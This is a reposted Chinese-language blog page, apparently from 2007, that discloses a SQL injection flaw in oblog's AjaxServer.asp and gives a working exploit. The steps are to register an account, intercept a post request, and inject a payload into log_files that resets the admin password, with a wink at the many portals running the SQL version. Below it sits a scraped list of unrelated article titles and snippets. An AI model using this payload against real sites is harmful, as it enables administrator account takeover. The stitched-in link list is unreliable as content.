漏洞描述:
通过构造特定的语句,可以更改任何用户的密码,包括管理员,严重级漏洞。

漏洞文件:AjaxServer.asp
变量:log_files
语句:log_files=Replace(log_files," ","")
If Left(log_files,1)="," Then log_files=Right(log_files,Len(log_files)-1)
rs("logpics") = log_files
'附加文件处理
If log_files <>"" Then
oblog.Execute "Update oblog_upfile Set logid=" & tid & " Where fileid In (" & log_files & ")"
End if
'Tag处理

利用:
首先找到使用sql版本的系统注册用户test,发表新日志,同时抓包,修改log_files。2);update/**/oblog_user/**/set/**/password= 7a57a5a743894a0e/**/where/**/username=admin;--
关于怎么区别sql和access的版本,目前也没发现好的方法,但是可以通过查看ver.asp文件看到当前版本号。某些版本好象没这文件。 官方好象出补丁了。很多blog门户站都是用的sql的版本,大家就悠着点吧。

转载于:https://www.cnblogs.com/allyesno/archive/2007/08/05/843883.html

oblog商业版本4.6注射漏洞,直接拿管理员相关推荐

  1. 查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)

    OpenSSH命令注入漏洞复现(CVE-2020-15778) 目录 漏洞描述 漏洞等级 漏洞影响版本 漏洞复现 修复建议 ▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现.通 ...

  2. 完美时空客服自助平台SQL注射漏洞

    漏洞详情 披露状态: 2010-07-23: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 19 ...

  3. php_rce-攻防世界-web-ThinkPHP版本5的相关漏洞

    题目是ThinkPHP版本5的相关漏洞 ThinkPHP5框架底层对控制器名过滤不严,可以通过url调用到ThinkPHP框架内部的敏感函数,进而导致getshell漏洞. s=index/think ...

  4. ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞

    ThinkPHP 5.0.x.5.1.x.5.2.x 全版本远程代码执行漏洞 漏洞概述: ThinkPHP是一个快速.兼容而且简单的轻量级国产PHP开发框架.借鉴Struts框架的Action对象,同 ...

  5. [转载] --- Fastjson1.2.68版及以下全版本远程代码执行漏洞通告

    再这样,真的要放弃fastjson了 [安全通告]Fastjson <=1.2.68全版本远程代码执行漏洞通告 尊敬的腾讯云用户,您好! 近日,腾讯云安全运营中心监测到,Fastjson < ...

  6. JEECG商业版本授权说明(仅限企业用户)

    JEECG社区秉承开源精神,为大家提供优秀的开源项目 JeecgBoot,同时针对企业用户我们提供商业服务,并提供商业技术支持:因为开源用户群体太大,总有个人咨询商业事情,特此统一回复说明" ...

  7. JeeWx 商业版本最近新增什么功能啦?

    JeeWx 商业版本最近新增什么功能啦? 2014-12-18 jeecg JEECG jeewx开发新功能 一.微信墙 此功能可以设置属于该公共号的微信墙,在微信客户端上输入微信墙即可进入微信墙模式 ...

  8. JEECG 商业版本最近新增什么功能啦?

    JEECG 商业版本最近新增什么功能啦? 2014-12-18 JEECG JEECG jeecg增加新的功能啦!!! 1.流程设计器 2.集成工作流引擎activit,智能化封装,在线配置表单,在线 ...

  9. JEECG 商业版本和开源版本有什么区别呢?

    好纠结啊,JEECG 商业版本和开源版本有什么区别呢? 小J博士来给你解答: 商业版本独有功能: 1.流程设计器 2.集成工作流引擎activit,智能化封装,在线配置表单,在线设计流程,流程和表单挂 ...

  10. 好纠结啊,JeeWx商业版本和开源版本有什么区别呢?

    好纠结啊,JeeWx商业版本和开源版本有什么区别呢? JeeWx开源版本是一套基础微信开发平台,有基础的微信菜单.素材管理.微信对接等基础功能,适合于开发者学习研究. JeeWx商业版本是一套成熟的微 ...

最新文章

  1. Onew——全球领先的区块链数字资产服务商
  2. android 获取ListView内部Item高度
  3. [转载]Dynamic Database Switching in Rails - How to do it
  4. 【C#】带等待窗体的BackgroundWorker
  5. seleuium 禁止检测_如何突破网站对selenium的屏蔽
  6. coin3D中导入机器人模型
  7. Java利用URL实现文件下载
  8. android m3u8合成ts,M3U8-TS文件合并为MP4文件
  9. 如何让WPS像word一样使用快捷键打开MathType
  10. Room的基本使用(一)
  11. pymol安装教程linux,Pymol安装与问题解决
  12. java for 代表什么意思_for(int a:i)在java 编程中是什么意思
  13. 华硕关闭更新BIOS
  14. 【Android应用开发之前端——简易App登录页面】
  15. 运放的原理、应用、参数和命名规则
  16. 初学微信云开发,云函数实现两数相加
  17. 引力财经直播室Java 简介
  18. 苏菲兔子和魔法师小麦
  19. Wireshark malformed packet
  20. 对持续集成、 持续交付、持续部署和持续发布的介绍

热门文章

  1. Android签名工具 AndroidMultitool使用方法
  2. Linux capability详解
  3. 剑网三 服务器维护时间,剑网3白帝风云什么时候开放
  4. *sql注入实战--记一次绕过WTS-WAF拦截注入**
  5. 微信诈骗产业链,俩字儿是核心:杀熟
  6. 【100+ python基础入门-32】元组元素的增删改查操作方法总结
  7. [附源码]Java计算机毕业设计SSM大学生志愿者管理系统
  8. TC流量控制HTB示例
  9. JZOJ4722. 跳楼机
  10. 答题系统 html源码,答题系统.html